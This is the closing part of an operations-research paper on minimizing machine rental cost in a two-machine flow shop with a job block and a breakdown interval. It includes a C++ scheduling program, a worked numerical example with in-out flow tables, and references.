t1(Si) & t2(Si) on machine A & B respectively.\n\nStep 11: Evaluate completion time CT (Si) of 1stjob of each of above selected sequence Si on machine A. Step 12: Calculate utilization time Uiof 2ndmachine for each of above selected sequence Si as:\n\nUi= t2 (Si) – CT (Si) for i=1, 2 , 3,…r.\n\nStep 13: Find Min {Ui}, i=1, 2 …r. let it be corresponding to i = m, then Sm is the optimal sequence for minimum rental cost.\n\nMin rental cost = t1(Sm) × C1+ Um× C2\n\nWhere C1 & C2 are the rental cost per unit time of 1st & 2 nd machines respectively. 10. Programme #include<iostream.h> #include<stdio.h> #include<conio.h> #include<process.h> void display(); void schedule(int,int); void inout_times(int []); void update(); void time_for_job_blocks(); float min; int job_schedule; int job_schedule_final; int n; float a1,b1; float a1_jb,b1_jb; float a1_temp,b1_temp; int job_temp;\n\nint group;//variables to store two job blocks int bd1,bd2;//break down interval\n\nfloat a1_t, b1_t; float a1_in,a1_out; float b1_in,b1_out;\n\nfloat ta={32767,32767,32767,32767,32767},tb={32767,32767,32767,32767,32767}; void main()\n\n(7)\n\n{ clrscr(); int a,b; float p,q; int optimal_schedule_temp; int optimal_schedule; float cost_a,cost_b,cost;\n\nfloat min; //Variables to hold the processing times of the job blocks cout<<\"How many Jobs (<=15) : \";\n\ncin>>n; if(n<1 || n>15) {\n\ncout<<\"Wrong input, No. of jobs should be less than 15..\\n Exitting\"; getch();\n\nexit(0); }\n\ncout<<\"Enter the processing time and their respective probabilities \"; for(int i=1;i<=n;i++)\n\n{\n\ncout<<\"\\nEnter the processing time and its probability of \"<<i<<\" job for machine A : \"; cin>>a[i]>>p[i];\n\ncout<<\"\\nEnter the processing time and its probability of \"<<i<<\" job for machine B : \"; cin>>b[i]>>q[i];\n\n//Calculate the expected processing times of the jobs for the machines: a1[i] = a[i]*p[i];\n\nb1[i] = b[i]*q[i]; }\n\ncout<<\"\\nEnter the two job blocks (two numbers from 1 to \"<<n<<\") : \"; cin>>group>>group;\n\ncout<<\"\\nEnter the break down intervals : \"; cin>>bd1>>bd2;\n\ncout<<\"\\nEnter the Rental cost of machine A : \"; cin>>cost_a;\n\ncout<<\"\\nEnter the Rental cost of machine B : \"; cin>>cost_b;\n\n(8)\n\ntime_for_job_blocks(); int t = n-1;\n\nschedule(t,1);\n\n//Calculating In-Out times inout_times(job_schedule_final);\n\n//Calculating revised processing times for both the machines //That is updating a1[], and b1[]\n\nupdate();\n\n//REpeat the process for all possible sequences\n\nfor(int k=1;k<=n;k++) //Loop of all possible sequences {\n\nfor(int i=1;i<=n;i++) {\n\noptimal_schedule_temp[i]=job_schedule_final[i]; }\n\nint temp = job_schedule_final[k]; optimal_schedule_temp=temp; for(i=k;i>1;i--) { optimal_schedule_temp[i]=job_schedule_final[i-1]; } //Calling inout_times() int flag=0; for(i=1;i<n;i++) { if(optimal_schedule_temp[i]==group && optimal_schedule_temp[i+1]==group) { flag=1; break; } } if(flag==1) { inout_times(optimal_schedule_temp); ta[k]=a1_out[n]-a1_in; tb[k]=b1_out[n]-b1_in;\n\n(9)\n\nif(tb[k]<tb[k-1]) {\n\n//copy optimal_schedule_temp to optimal_schedule for(int j=1;j<=n;j++) { optimal_schedule[j]=optimal_schedule_temp[j]; } } } }\n\nfloat smalla = ta; float smallb = tb; for(int ii=2;ii<=n;ii++) { if(smalla>ta[ii]) smalla = ta[ii]; if(smallb>tb[ii]) smallb = tb[ii]; } clrscr();\n\ncout<<\"\\n\\n\\n\\n\\n\\n\\n\\n\\t\\t\\t #####THE SOLUTION##### \";\n\ncout<<\"\\n\\n\\t***************************************************************\"; cout<<\"\\n\\n\\n\\t Optimal Sequence is : \";\n\nfor 
(ii=1;ii<=n;ii++) {\n\ncout<<optimal_schedule[ii]<<\" \"; }\n\ncout<<\"\\n\\n\\t The smallest possible time span for machine A is : \"<<smalla; cout<<\"\\n\\n\\t The smallest possible time span for machine B is : \"<<smallb; cost = cost_a*smalla+cost_b*smallb;\n\ncout<<\"\\n\\n\\t Total Minimum Rental cost for both the machines is : \"<<cost;\n\ncout<<\"\\n\\n\\n\\t***************************************************************\"; getch();\n\n}\n\nvoid time_for_job_blocks() {\n\n//The expected processing times for two job blocks are if(b1[group]<a1[group])\n\n(10)\n\n{ min = b1[group]; } else { min = a1[group]; }\n\na1_jb = a1[group]+a1[group] - min; //(b1[k]<a1[m])?b1[k]:a1[m]; b1_jb = b1[group]+b1[group] - min; //(b1[k]<a1[m])?b1[k]:a1[m]; getch(); } void update() { for(int i=1;i<=n;i++) {\n\nif(a1_in[i]<=bd1 && a1_out[i]<=bd1 || a1_in[i]>=bd2 && a1_out[i]>=bd2) { a1_t[i] =a1_t[i]; } else { a1_t[i] += (bd2-bd1); }\n\nif(b1_in[i]<=bd1 &&b1_out[i]<=bd1 || b1_in[i]>=bd2 && b1_out[i]>=bd2) { b1_t[i] =b1_t[i]; } else { b1_t[i] += (bd2-bd1); } }\n\n//Putting values of a1_t and b1_t into a1 and b1 with proper order of jobs for(i=1;i<=n;i++)\n\n{\n\na1[job_schedule_final[i]] = a1_t[i]; b1[job_schedule_final[i]] = b1_t[i]; }\n\n(11)\n\ntime_for_job_blocks();\n\nint t = n-1; schedule(t,1); }\n\nvoid inout_times(int schedule[]) {\n\nfor(int i=1;i<=n;i++) {\n\n//Reorder the values of a1[] and b1[] according to sequence a1_t[i] = a1[schedule[i]]; b1_t[i] = b1[schedule[i]]; } for(i=1;i<=n;i++) { if(i==1) { a1_in[i]=0.0; a1_out[i] = a1_in[i]+a1_t[i]; b1_in[i] = a1_out[i]; b1_out[i] = b1_in[i]+b1_t[i]; } else { a1_in[i]=a1_out[i-1]; a1_out[i] = a1_in[i]+a1_t[i]; if(b1_out[i-1]>a1_out[i]) { b1_in[i] = b1_out[i-1]; b1_out[i] = b1_in[i]+b1_t[i]; } else { b1_in[i] = a1_out[i]; b1_out[i] = b1_in[i]+b1_t[i]; } } } }\n\n(12)\n\nint js1=1,js2=n-1; void schedule(int t, int tt) { if(t==n-1) { js1=1; js2=n-1; } if(t>0 && tt==1) {\n\nfor(int i=1,j=1;i<=n;i++,j++) //loop from 1 to n-1 as there is one group { if(i!=group&&i!=group) { a1_temp[j] = a1[i]; b1_temp[j] = b1[i]; job_temp[j] = i; }\n\nelse if(group<group && i==group) { a1_temp[j] = a1_jb; b1_temp[j] = b1_jb; job_temp[j] = -1; } else { j--; } } //Finding smallest in a1 float min1= 32767; int pos_a1; for(j=1;j<n;j++) { if(min1>a1_temp[j]) { pos_a1 = j; min1 = a1_temp[j]; } }\n\n(13)\n\n//Finding smallest in b1 float min2= 32767; int pos_b1; for(int k=1;k<n;k++) { if(min2>b1_temp[k]) { pos_b1 = k; min2 = b1_temp[k]; } } if(min1<min2) { job_schedule[js1] = job_temp[pos_a1]; js1++; a1_temp[pos_a1]=32767; b1_temp[pos_a1]=32767; } else { job_schedule[js2] = job_temp[pos_b1]; js2--; a1_temp[pos_b1]=32767; b1_temp[pos_b1]=32767; } }\n\nelse if(t>0 && tt!=1) { //Finding smallest in a1 float min1= 32767; int pos_a1; for(int i=1;i<n;i++) { if(min1>a1_temp[i]) { pos_a1 = i; min1 = a1_temp[i]; } }\n\n(14)\n\n//Finding smallest in b1 float min2= 32767; int pos_b1; for(i=1;i<n;i++) { if(min2>b1_temp[i]) { pos_b1 = i; min2 = b1_temp[i]; } } if(min1<min2) { job_schedule[js1] = job_temp[pos_a1]; js1++; a1_temp[pos_a1]=32767; b1_temp[pos_a1]=32767; } else { job_schedule[js2] = job_temp[pos_b1]; js2--; a1_temp[pos_b1]=32767; b1_temp[pos_b1]=32767; } } t--; if(t!=0) { schedule(t, 2); }\n\n//final job schedule int i=1; while(job_schedule[i]!=-1) { job_schedule_final[i]=job_schedule[i]; i++; } job_schedule_final[i]=group;\n\n(15)\n\ni++; job_schedule_final[i]=group; i++; while(i<=n) { job_schedule_final[i]=job_schedule[i-1]; i++; } 11. 
11. Numerical Illustration

Consider a 5 jobs and 2 machines problem to minimize the rental cost. The processing times with their respective associated probabilities are given as follows. Obtain the optimal sequence of jobs and the minimum rental cost of the complete set up, given that the rental costs per unit time for machines M1 & M2 are 16 and 14 units respectively, and that jobs (2, 5) are to be processed as an equivalent group job, with the break-down interval (5, 10).

| Jobs i | Ai | pi | Bi | qi |
|---|---|---|---|---|
| 1 | 11 | 0.1 | 8 | 0.2 |
| 2 | 15 | 0.3 | 11 | 0.2 |
| 3 | 14 | 0.1 | 15 | 0.1 |
| 4 | 17 | 0.2 | 16 | 0.2 |
| 5 | 12 | 0.3 | 18 | 0.3 |

Solution

Step 1: The expected processing times A'i and B'i on machines A and B are as in Table 1.

Step 2: The processing times of the equivalent job block β = (2, 5), obtained by using the Maggu and Das criteria (shown in Table 2), are given by

A'β = 4.5 + 3.6 - 2.2 = 5.9 and B'β = 2.2 + 5.4 - 2.2 = 5.4

Step 3: Using Johnson's two machines algorithm, the optimal sequence is S = 1, 3, β, 4, i.e. S = 1 - 3 - 2 - 5 - 4.

Step 4: The in-out flow table for the sequence S = 1 - 3 - 2 - 5 - 4 is prepared (shown in Table 3).

Step 5: On considering the effect of the break-down interval (5, 10), the revised processing times A''i and B''i on machines A and B are calculated (shown in Table 4).

Step 6: The new processing times of the equivalent job block β = (2, 5), by using the Maggu and Das criteria (shown in Table 5), are given by

A''β = 9.5 + 8.6 - 7.2 = 10.9 and B''β = 7.2 + 5.4 - 7.2 = 5.4

Step 7: Using Johnson's two machines algorithm, the optimal sequence is S1 = 1, 3, β, 4, i.e. S1 = 1 - 3 - 2 - 5 - 4.

Step 8: The processing time of the 1st job of S1 on machine A is 1.1, i.e. α = 1.1.

Step 9: The other optimal sequences for minimizing rental cost are S2 = 2 - 5 - 1 - 3 - 4, S3 = 3 - 1 - 2 - 5 - 4 and S4 = 4 - 1 - 3 - 2 - 5.

Step 10: The in-out flow tables for the sequences S1, S3 and S4 having job block (2, 5) are as shown in Tables 6, 7 and 8.

For S1 = 1 - 3 - 2 - 5 - 4:

Total time elapsed on machine A = t1(S1) = 24.0. Total time elapsed on machine B = t2(S1) = 29.2.

Utilization time of 2nd machine (B) = U1 = 29.2 - 1.1 = 28.1.

For S3 = 3 - 1 - 2 - 5 - 4:

Total time elapsed on machine A = t1(S3) = 24.0. Total time elapsed on machine B = t2(S3) = 29.2.

Utilization time of 2nd machine (B) = U2 = 29.2 - 1.4 = 27.8.

For S4 = 4 - 1 - 3 - 2 - 5:

Total time elapsed on machine A = t1(S4) = 24.0. Total time elapsed on machine B = t2(S4) = 29.4.

Utilization time of 2nd machine (B) = U3 = 29.4 - 3.4 = 26.0.

The total utilization of machine A is fixed at 24.0 units, and the minimum utilization of B is 26.0 units, attained by the sequence S4. Therefore the optimal sequence is S4 = 4 - 1 - 3 - 2 - 5.

Therefore the minimum rental cost is 24.0 × 16 + 26.0 × 14 = 748 units.

12. Remarks

1. In case the break-down interval criterion is not taken into consideration, the results tally with Singh T.P. and Gupta Deepak.

2. The study may further be extended if parameters like set up time, transportation time etc. are taken into consideration.

References

Johnson, S.M. (1954), Optimal two & three stage production schedules with set up times included, Nav. Res. Log. Quart., Vol. 1, pp 61-68.

Smith, W.E. (1956), Various optimizers for single stage production, Naval Research Logistics 3, pp 59-66.

Ignall, E. and Schrage, L. (1965), Application of branch and bound technique to some flow shop scheduling problems, Operations Research 13, 400-412.

Bagga, P.C. (1969), Sequencing in a rental situation, Journal of Canadian Operational Research Society 7, 152-153.

Maggu, P.L. & Das, G. (1977), Equivalent jobs for job block in job sequencing, Opsearch, Vol. 14, No. 4, pp. 277-281.

Szwarc, W. (1977), Special cases of the flow shop problem, Naval Research Logistics Quarterly, 24, pp 483-492.

Szwarc, W. (1983), The flow shop problem with mean completion time criterion, AIIE Trans. 15, pp 172-176.

Singh, T.P. (1985), On n x 2 flow shop problem solving job block, transportation times, arbitrary time and break-down machine times, PAMS, Vol. XXI, No. 1-2 (1985).

Adiri, I., Bruno, J., Frostig, E. and Rinnooy Kan, A.H.G. (1989), Single machine flow time scheduling with a single break-down, Acta Informatica, Vol. 26 (No. 7): 679-696.

Akturk, M.S. and Gorgulu, E. (1999), Match up scheduling under a machine break-down, European Journal of Operational Research: 81-99.

Chander Shekharan, K., Rajendra, Deepak Chanderi (1992), An efficient heuristic approach to the scheduling of jobs in a flow shop, European Journal of Operational Research 61, 318-325.

Singh, T.P., K, Rajindra & Gupta Deepak (2005), Optimal three stage production schedule, the processing times and set up times associated with probabilities including job block criteria, Proceedings of National Conference FACM- , 463-470.

Chandramouli, A.B. (2005), Heuristic approach for N job 3 machine flow shop scheduling problem involving transportation time, break-down time and weights of jobs, Mathematical and Computational Applications, Vol. 10 (No. 2): 301-305.

Singh, T.P., Gupta Deepak (2006), Minimizing rental cost in two stage flow shop, the processing time associated with probabilities including job block, Reflections de ERA, Vol. 1, Issue 2, pp 107-120.

Belwal, O.K. and Mittal, Amit (2008), N jobs machine flow shop scheduling problem with break-down of machines, transportation time and equivalent job block, Bulletin of Pure & Applied Sciences - Mathematics, Jan-June 2008, Source Volume 27, Source Issue: 1.

Notes

Note 1. The break-down time interval (a, b) for which the machines remain unavailable is deterministic in nature. The break-down interval length L = b - a is known.

Note 2. The idle time of the 1st machine is always zero, i.e. $\sum_{i=1}^{n} I^{(1)}_i = 0$.

Note 3. The idle time of the 1st job on the 2nd machine is $I^{(2)}_1$ = expected processing time of the 1st job on machine A = $A'_1$.

Note 4. The rental cost of the machines will be minimum if the idle time of the 2nd machine is minimum.

Table 1. The expected processing times A'i and B'i on machines A and B

| Jobs | A'i | B'i |
|---|---|---|
| 1 | 1.1 | 1.6 |
| 2 | 4.5 | 2.2 |
| 3 | 1.4 | 1.5 |
| 4 | 3.4 | 3.2 |
| 5 | 3.6 | 5.4 |

Table 2. The processing times after applying the equivalent job block β = (2, 5)

| Jobs | A'i | B'i |
|---|---|---|
| 1 | 1.1 | 1.6 |
| β | 5.9 | 5.4 |
| 3 | 1.4 | 1.5 |
| 4 | 3.4 | 3.2 |

Table 3. The in-out flow table for the sequence S = 1 - 3 - 2 - 5 - 4

| Jobs | A (In - Out) | B (In - Out) |
|---|---|---|
| 1 | 0.0 - 1.1 | 1.1 - 2.7 |
| 3 | 1.1 - 2.5 | 2.7 - 4.2 |
| 2 | 2.5 - 7.0 | 7.0 - 9.2 |
| 5 | 7.0 - 10.6 | 10.6 - 16.0 |
| 4 | 10.6 - 14.0 | 16.0 - 19.2 |

Table 4. The revised processing times A''i and B''i on machines A and B

| Jobs | A''i | B''i |
|---|---|---|
| 1 | 1.1 | 1.6 |
| 2 | 9.5 | 7.2 |
| 3 | 1.4 | 1.5 |
| 4 | 3.4 | 3.2 |
| 5 | 8.6 | 5.4 |

Table 5. The new processing times of the equivalent job block β = (2, 5) after the break-down effect

| Jobs | A''i | B''i |
|---|---|---|
| 1 | 1.1 | 1.6 |
| β | 10.9 | 5.4 |
| 3 | 1.4 | 1.5 |
| 4 | 3.4 | 3.2 |

Table 6. The in-out flow table for sequence S1 = 1 - 3 - 2 - 5 - 4

| Jobs | A (In - Out) | B (In - Out) |
|---|---|---|
| 1 | 0.0 - 1.1 | 1.1 - 2.7 |
| 3 | 1.1 - 2.5 | 2.7 - 4.2 |
| 2 | 2.5 - 12.0 | 12.0 - 19.2 |
| 5 | 12.0 - 20.6 | 20.6 - 26.0 |
| 4 | 20.6 - 24.0 | 26.0 - 29.2 |
Table 7. The in-out flow table for sequence S3 = 3 - 1 - 2 - 5 - 4

| Jobs | A (In - Out) | B (In - Out) |
|---|---|---|
| 3 | 0.0 - 1.4 | 1.4 - 2.9 |
| 1 | 1.4 - 2.5 | 2.9 - 4.5 |
| 2 | 2.5 - 12.0 | 12.0 - 19.2 |
| 5 | 12.0 - 20.6 | 20.6 - 26.0 |
| 4 | 20.6 - 24.0 | 26.0 - 29.2 |

Table 8. The in-out flow table for sequence S4 = 4 - 1 - 3 - 2 - 5

| Jobs | A (In - Out) | B (In - Out) |
|---|---|---|
| 4 | 0.0 - 3.4 | 3.4 - 6.6 |
| 1 | 3.4 - 4.5 | 6.6 - 8.2 |
| 3 | 4.5 - 5.9 | 8.2 - 9.7 |
| 2 | 5.9 - 15.4 | 15.4 - 22.6 |
| 5 | 15.4 - 24.0 | 24.0 - 29.4 |
" ]
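For readers who want to experiment with the ordering rule in Steps 1-3, here is a minimal C++ sketch (an added illustration, separate from the paper's Turbo-C++ listing): it forms the expected times, replaces a job pair by the Maggu & Das equivalent block, and applies Johnson's two-machine rule. The type and function names (`Job`, `equivalentBlock`, `johnsonOrder`) are assumptions made for this sketch.

```
#include <algorithm>
#include <iostream>
#include <string>
#include <vector>

struct Job { int id; double a, b; };   // expected times A'_i, B'_i

// Maggu & Das equivalent block for jobs k and m processed consecutively.
Job equivalentBlock(const Job& k, const Job& m) {
    double t = std::min(k.b, m.a);
    return { -1, k.a + m.a - t, k.b + m.b - t };
}

// Johnson's two-machine rule: jobs with a <= b go first in increasing a;
// the remaining jobs go last in decreasing b.
std::vector<Job> johnsonOrder(const std::vector<Job>& jobs) {
    std::vector<Job> front, back;
    for (const Job& j : jobs)
        (j.a <= j.b ? front : back).push_back(j);
    std::sort(front.begin(), front.end(),
              [](const Job& x, const Job& y) { return x.a < y.a; });
    std::sort(back.begin(), back.end(),
              [](const Job& x, const Job& y) { return x.b > y.b; });
    front.insert(front.end(), back.begin(), back.end());
    return front;
}

int main() {
    // Expected times from the numerical illustration (A_i*p_i, B_i*q_i),
    // with jobs 2 and 5 replaced by the equivalent block beta.
    std::vector<Job> jobs = { {1, 1.1, 1.6}, {3, 1.4, 1.5}, {4, 3.4, 3.2} };
    jobs.push_back(equivalentBlock({2, 4.5, 2.2}, {5, 3.6, 5.4}));
    for (const Job& j : johnsonOrder(jobs))
        std::cout << (j.id == -1 ? std::string("beta") : std::to_string(j.id)) << " ";
    std::cout << "\n";   // prints: 1 3 beta 4, matching Step 3's sequence S
}
```

On the illustration's data this reproduces the order 1, 3, β, 4 found in Step 3.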
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7584163,"math_prob":0.95848316,"size":26879,"snap":"2021-21-2021-25","text_gpt3_token_len":8799,"char_repetition_ratio":0.15032558,"word_repetition_ratio":0.14713897,"special_character_ratio":0.3567841,"punctuation_ratio":0.16464776,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9845183,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-05-12T21:28:21Z\",\"WARC-Record-ID\":\"<urn:uuid:5d1d0e43-bc6c-4d86-9bfa-6bc482478db3>\",\"Content-Length\":\"259015\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:ca3b5f0d-7889-400b-a5cd-17ec31d8f411>\",\"WARC-Concurrent-To\":\"<urn:uuid:23e8a2b3-660b-4d98-a0d3-139e60cb098a>\",\"WARC-IP-Address\":\"138.197.149.215\",\"WARC-Target-URI\":\"https://1library.net/document/qo12dpjz-minimizing-specified-processing-associated-probabilities-including-interval-criteria.html\",\"WARC-Payload-Digest\":\"sha1:7WQKEE6Z7C2LHHPESXFIJB3JNEE3RQJW\",\"WARC-Block-Digest\":\"sha1:MYEXELLFXIKL5SMNQ5SZSEGET2NZB743\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-21/CC-MAIN-2021-21_segments_1620243989705.28_warc_CC-MAIN-20210512193253-20210512223253-00108.warc.gz\"}"}
https://www.tutorialspoint.com/find-the-first-second-and-third-minimum-elements-in-an-array-in-cplusplus-program
[ "# Find the first, second and third minimum elements in an array in C++ program\n\nC++Server Side ProgrammingProgramming\n\n#### C in Depth: The Complete C Programming Guide for Beginners\n\n45 Lectures 4.5 hours\n\n#### Practical C++: Learn C++ Basics Step by Step\n\nMost Popular\n\n50 Lectures 4.5 hours\n\n#### Master C and Embedded C Programming- Learn as you go\n\n66 Lectures 5.5 hours\n\nSuppose we have an array of n elements. We have to find the first, second and the third minimum elements in the array. First minimum is the minimum of the array, second min is minimum but larger than the first one, and similarly the third min is minimum but greater than second min.\n\nScan through each element, then check the element, and relate the condition for first, second and third min elements conditions to solve this problem.\n\n## Example\n\n#include<iostream>\nusing namespace std;\nint getThreeMins(int arr[], int n) {\nint first = INT_MAX, sec = INT_MAX, third = INT_MAX;\nfor (int i = 0; i < n; i++) {\nif (arr[i] < first) {\nthird = sec;\nsec = first;\nfirst = arr[i];\n} else if (arr[i] < sec) {\nthird = sec;\nsec = arr[i];\n} else if (arr[i] < third)\nthird = arr[i];\n}\ncout << \"First min = \" << first << endl;\ncout << \"Second min = \" << sec << endl;\ncout << \"Third min = \" << third << endl;\n}\nint main() {\nint array[] = {4, 9, 18, 32, 12};\nint n = sizeof(array) / sizeof(array);\ngetThreeMins(array, n);\n}\n\n## Output\n\nFirst min = 4\nSecond min = 9\nThird min = 12" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.81223303,"math_prob":0.983655,"size":2861,"snap":"2022-40-2023-06","text_gpt3_token_len":718,"char_repetition_ratio":0.18655933,"word_repetition_ratio":0.09259259,"special_character_ratio":0.27333102,"punctuation_ratio":0.08527132,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99766034,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-10-06T16:38:17Z\",\"WARC-Record-ID\":\"<urn:uuid:6fccf8e6-7fa5-4184-9a9e-720739ad1c1f>\",\"Content-Length\":\"37929\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:aa5da88c-37f5-4211-ac80-020ca4c3c8d8>\",\"WARC-Concurrent-To\":\"<urn:uuid:1f9459f7-c796-4064-bc9e-f6be256e82ef>\",\"WARC-IP-Address\":\"192.229.210.176\",\"WARC-Target-URI\":\"https://www.tutorialspoint.com/find-the-first-second-and-third-minimum-elements-in-an-array-in-cplusplus-program\",\"WARC-Payload-Digest\":\"sha1:BVSTLHYIZOWCYEMBF2DYBMD2MPZ7LDAP\",\"WARC-Block-Digest\":\"sha1:ICXKRJH7SWV3DLXMRWTEB372PGVPOBB7\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-40/CC-MAIN-2022-40_segments_1664030337853.66_warc_CC-MAIN-20221006155805-20221006185805-00263.warc.gz\"}"}
https://www.meritnation.com/ask-answer/question/explain-the-derivation-of-elastic-inelastic-collision/work-energy-and-power/16855625
[ "# Explain the derivation of elastic & inelastic collision\n\nDear Student,\n\nElastic Collision in One\nDimension", null, "Consider that two perfectly elastic bodies A and B of masses M1 and M2 moving with initial velocities u1 and uundergo head on collision and continue moving along the same straight line with final velocities v1 and v2.\n\nAs in an elastic collision, momentum is conserved.\n\n∴ M1u1 M2u2 = M1v1 + M2v2 … (i)\n\nSince kinetic energy is also conserved in an elastic collision, we obtain", null, "From equation (i), we obtain\n\nM1 (u1 − v1) = M2 (v− u2) … (iii)\n\nFrom equation (ii), we obtain", null, "u1 − u2 = v2 − v1 … (v)\n\nFrom equation (v), it follows that in one-dimensional elastic collision, the relative velocity of approach (u1 − u2) before collision is equal to the relative velocity of separation (v2 − v1) after collision.\n\nThe ratio of relative velocity of separation after the collision to the relative velocity of the approach before the collision is known as coefficient of restitution or coefficient of resilience.\n\ne = v2−v1/u1−u2\n\nFor perfectly elastic collision, e = 1\n\nCalculation of velocities after collision:\n\nLet us first find the velocity of body A after collision.\n\nFrom equation (v), we have\n\nv2 = u1 − u​​​​​2 + v1\n\nSubstituting for v2 in equation (i), we obtain", null, "Again from equation (v), we have\n\nv1 v2 − u​​​​​1 + u2\n\nSubstituting for v1 in equation (i), we obtain", null, "Special Cases\n\n• When the two bodies are of equal masses i.e.,\n\nM1 = MM (say)\n\nFrom equation (vi), we have", null, "• When the target body (B) is at rest:\n\nIn this case, u2 = 0\n\nSubstituting u2 = 0 in equations (vi) and (vii), we obtain", null, "When M2 >> M1, in equation (viii) and (ix), M1 can be neglected in comparison to Mi.e.\nM1 M2  -M2 and\nM1 + M2  M2\nTherefore, we have", null, "Kindly post the different part of the question in different thread.\n\nRegards\n\n• 0\nWhat are you looking for?" ]
[ null, "https://img-nm.mnimgs.com/img/study_content/lp/1/11/4/184/655/1263/1262/25-5-09_LP_Vandana_Phy_1.11.4.6.2.6_srav_SS_html_3c44dacc.png", null, "https://s3mn.mnimgs.com/img/shared/content_ck_images/ck_617114ae0d505.jpg", null, "https://s3mn.mnimgs.com/img/shared/content_ck_images/ck_617114c7a4e2d.jpg", null, "https://s3mn.mnimgs.com/img/shared/content_ck_images/ck_617114f9c58f5.jpg", null, "https://s3mn.mnimgs.com/img/shared/content_ck_images/ck_6171150a6e9e9.jpg", null, "https://s3mn.mnimgs.com/img/shared/content_ck_images/ck_617115216033d.jpg", null, "https://s3mn.mnimgs.com/img/shared/content_ck_images/ck_6171154d385f0.jpg", null, "https://s3mn.mnimgs.com/img/shared/content_ck_images/ck_61711571a9b7a.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.83242595,"math_prob":0.9902472,"size":1765,"snap":"2021-43-2021-49","text_gpt3_token_len":493,"char_repetition_ratio":0.1737649,"word_repetition_ratio":0.012232416,"special_character_ratio":0.27932012,"punctuation_ratio":0.09063444,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99760056,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16],"im_url_duplicate_count":[null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-12-08T22:09:16Z\",\"WARC-Record-ID\":\"<urn:uuid:d78f22cb-aa3c-46f6-aa0f-13c4f63b7b6f>\",\"Content-Length\":\"49128\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:0cd7c2f9-c14c-4cf8-b364-e35c8e2eca69>\",\"WARC-Concurrent-To\":\"<urn:uuid:b67f6a3b-29d4-425a-a77d-0241f8fb025d>\",\"WARC-IP-Address\":\"13.32.208.81\",\"WARC-Target-URI\":\"https://www.meritnation.com/ask-answer/question/explain-the-derivation-of-elastic-inelastic-collision/work-energy-and-power/16855625\",\"WARC-Payload-Digest\":\"sha1:72CX3S3JKT5CMWQW3RRALHXOUR45A4AT\",\"WARC-Block-Digest\":\"sha1:LEXVGWA7QPYRIUIQVSLHFKHSYXNA6S4P\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-49/CC-MAIN-2021-49_segments_1637964363598.57_warc_CC-MAIN-20211208205849-20211208235849-00342.warc.gz\"}"}
http://www.telacommunications.com/misc/games/mathquiz/
[ "## Interactive Math Quizzes", null, "", null, "", null, "", null, "", null, "All questions have answers lower than 100. Addition, subtraction and multiplication.", null, "New! Addition, Subtraction, Multiplication and Division... all options available on our new Fraction Quiz.", null, "All answers will be below 1,000. There is an option to allow negative numbers for answers to Subtraction questions. Addition, subtraction and multiplication.", null, "Division and multiplication of fractions has now been combined with Addition and subtraction options.", null, "All answers will be between 0 and 10,000. Addition, subtraction and multiplication.", null, "Math and Money... Percentages, Interest, Commissions, Profit and Loss, Mortgages, Credit Cards and Compound Interest Calculator." ]
[ null, "http://www.telacommunications.com/misc/games/mathquiz/space180.gif", null, "http://www.telacommunications.com/misc/games/mathquiz/space180.gif", null, "http://www.telacommunications.com/misc/games/mathquiz/bmath.gif", null, "http://www.telacommunications.com/misc/games/mathquiz/fraction.gif", null, "http://www.telacommunications.com/misc/games/images/btn.gif", null, "http://www.telacommunications.com/misc/games/images/btn4.gif", null, "http://www.telacommunications.com/misc/games/images/btn2.gif", null, "http://www.telacommunications.com/misc/games/images/btn5.gif", null, "http://www.telacommunications.com/misc/games/images/btn3.gif", null, "http://www.telacommunications.com/misc/games/images/btn6.gif", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8774274,"math_prob":0.7448666,"size":682,"snap":"2020-24-2020-29","text_gpt3_token_len":136,"char_repetition_ratio":0.18436578,"word_repetition_ratio":0.05263158,"special_character_ratio":0.21847507,"punctuation_ratio":0.23966943,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9911079,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20],"im_url_duplicate_count":[null,null,null,null,null,6,null,6,null,null,null,6,null,null,null,6,null,null,null,6,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-07-11T20:43:05Z\",\"WARC-Record-ID\":\"<urn:uuid:c726fd5a-873a-4cde-a2c3-2c3085e58b22>\",\"Content-Length\":\"5733\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:dfb87927-d636-462d-95fd-cdfa7015d37a>\",\"WARC-Concurrent-To\":\"<urn:uuid:6374896e-7ced-4c4a-8c86-f447a16f77cb>\",\"WARC-IP-Address\":\"143.95.229.34\",\"WARC-Target-URI\":\"http://www.telacommunications.com/misc/games/mathquiz/\",\"WARC-Payload-Digest\":\"sha1:K3GXJULRNBNIQYMBBXGJOQ4YHLFNSHM5\",\"WARC-Block-Digest\":\"sha1:NHEVIDKIAMVR7MCCNDMVDCNJNTHT7YAT\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-29/CC-MAIN-2020-29_segments_1593655937797.57_warc_CC-MAIN-20200711192914-20200711222914-00594.warc.gz\"}"}
